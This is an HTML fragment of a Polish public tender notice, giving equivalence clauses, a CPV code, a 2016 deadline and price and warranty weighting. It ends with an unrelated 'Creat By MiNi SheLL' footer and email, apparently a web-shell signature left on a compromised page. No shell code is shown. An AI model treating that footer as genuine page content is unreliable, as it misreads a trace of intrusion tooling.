4. W przypadku, gdy w zapisach SIWZ zostały wskazane nazwy, znaki towarowe lub typy materiałów czy produktów lub normy, aprobaty, specyfikacje czy systemy, o których mowa w art. 30 ust. 1-3 ustawy, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od określonych w dokumentacji.
5. W przypadku oferowania rozwiązań równoważnych w stosunku do rozwiązań określonych w SIWZ, Wykonawca zobowiązany jest do wypełnienia wymogu wynikającego z art. 30 ust. 5 ustawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.97.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji asortymentu - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com